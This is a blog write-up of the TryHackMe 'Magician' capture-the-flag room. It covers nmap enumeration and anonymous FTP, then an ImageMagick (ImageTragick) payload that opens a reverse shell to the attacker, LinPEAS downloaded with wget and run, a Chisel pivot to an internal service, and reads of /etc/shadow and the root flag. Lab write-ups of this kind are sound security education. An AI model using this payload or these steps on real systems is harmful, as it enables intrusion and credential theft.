Magician-TryHackMe

Magician-THM

This is a write-up for TryHackMe’s room named Magician.Description of the room says that — This magical website lets you convert image file formats.This room can be found at:

https://tryhackme.com/room/magician

Make an entry in /etc/hosts first for “magician” as mentioned. Now Let’s start our enumeration process with nmap.

Enumeration

NMAP

nmap -sC -sV 10.10.148.85

┌──(kali㉿kali)-[/tmp]
└─$ nmap -sC -sV 10.10.148.85
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-22 09:05 EST
Nmap scan report for 10.10.148.85
Host is up (0.023s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
8080/tcp open http-proxy
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404
| Vary: Origin
| Vary: Access-Control-Request-Method
| Vary: Access-Control-Request-Headers
| Content-Type: application/json
| Date: Mon, 22 Feb 2021 14:07:04 GMT
| Connection: close
| {"timestamp":"2021-02-22T14:07:05.669+0000","status":404,"error":"Not Found","message":"No message available","path":"/nice%20ports%2C/Tri%6Eity.txt%2ebak"}
| GetRequest:
| HTTP/1.1 404
| Vary: Origin
| Vary: Access-Control-Request-Method
| Vary: Access-Control-Request-Headers
| Content-Type: application/json
| Date: Mon, 22 Feb 2021 14:07:04 GMT
| Connection: close
| {"timestamp":"2021-02-22T14:07:04.814+0000","status":404,"error":"Not Found","message":"No message available","path":"/"}
| HTTPOptions:
| HTTP/1.1 404
| Vary: Origin
| Vary: Access-Control-Request-Method
| Vary: Access-Control-Request-Headers
| Content-Type: application/json
| Date: Mon, 22 Feb 2021 14:07:04 GMT
| Connection: close
| {"timestamp":"2021-02-22T14:07:05.051+0000","status":404,"error":"Not Found","message":"No message available","path":"/"}
| RTSPRequest:
| HTTP/1.1 505
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 465
| Date: Mon, 22 Feb 2021 14:07:04 GMT
| <!doctype html><html lang="en"><head><title>HTTP Status 505
| HTTP Version Not Supported</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 505
|_ HTTP Version Not Supported</h1></body></html>
|_http-title: Site doesn't have a title (application/json).
8081/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: magician

So FTP port and two web ports 8080 and 8081 are open.Let’s explore FTP port first.

FTP

Trying anonymous access and waiting(well almost forgetting in my case :)) gave us this hint:

┌──(kali㉿kali)-[/tmp]
└─$ ftp magician
Connected to magician.
220 THE MAGIC DOOR
Name (magician:kali): anonymous
331 Please specify the password.
Password:
230-Huh? The door just opens after some time? You're quite the patient one, aren't ya, it's a thing called 'delay_successful_login' in /etc/vsftpd.conf ;) Since you're a rookie, this might help you to get started: https://imagetragick.com. You might need to do some little tweaks though...
230 Login successful.
ftp>

So https://imagetragick.com/ indicates that we have CVE-2016–3714 somewhere,but where? Let’s explore our identified web ports.

Port 8080

port 8080

This doesn’t reveals anything, so let’s move on and and keep this port in mind.

Port 8081

port 8081

So as shown on the web page we can convert PNG to JPG and this is what the software “ImageMagick” does and this also told us that we have a vulnerability in this which can leas to RCE.

Exploit

Searching for ImageMagick exploit found this payload from PayLoadAllThings:

push graphic-context
encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/IP/9999 0<&1 2>&1'
pop graphic-context
pop graphic-context

Saved this payload as shell.png,started a netcat session and uploaded the png file on to the website:

reverse shell

We got our reverse shell and user’s flag in /home/magician directory.

Stabilize Shell

Upgrade and stabilize our shell to a more usable one by running the following commands:

/usr/bin/script -qc /bin/bash /dev/null
control+z to background
stty raw -echo
fg
export TERM=xterm

Privilege Escalation

Transfer and run LinPEAS on to the target by running the following commands:

On Kali, where lineapeas.sh is copied:

python3 -m http.server

On Target:

wget http://10.8.98.192:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

linpeas.sh

A service is running on Port 6666 internally. Let’s try to pivot to this internal port.

Pivoting

We will use Chisel to do the pivoting. This useful tool can be found here:- https://github.com/jpillora/chisel
Compile it by following the instruction given and transfer it on to the target.
Run the following on the attacking kali machine:

./chisel server -p 9000 --reverse -v

chisel as server on kali

Run the following command on the the target:

./chisel client 10.8.98.192:9000 R:10.8.98.192:7777:127.0.0.1:6666

chisel as client on target

Here chisel which is running as a client will connect to the server(chisel running on kali machine on port 9000) and will ‘R’edirect the traffic from kali machine(10.8.98.192 in my case) from port 7777 to the internal port 6666 on the Target Machine.

Accessing http://10.8.98.192:7777 on the kali machine, we got:

So we have a web page that ask’s us for file names. Tried reading few files like /etc/passwd,/etc/hosts and was able to read them. May be we can read files which root can read, so tried reading /etc/shadow and we got some output which looks to be encoded.Why not try to read the root flag itself?

And indeed we can and we got a base64 encoded string. Decoding it gives is the root flag:

That it. See you in the next write-up.

--

--

--

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Virtual Python Workshop: Exploring Environmental Data with pandas and GeoPy

A gravel pathway leads to a lake’s edge.

Making Data Work For Your Project

I Learnt Coding Four Application Frameworks | Here’s What Happened…

Adding an External DLL to a Nuget Package

Moving Beyond VSCode

Run containers securely with gVisor on EKS

New Feature for Developers: Auto Generate Layer Data

Block header parsing tool: GSoC’19

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
0xsanz

0xsanz

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

More from Medium

TryHackMe-Watcher

Walkthrough : InsecureBankv2

Log4Shell

Random Lego Build — Dune Cat (REDLINE)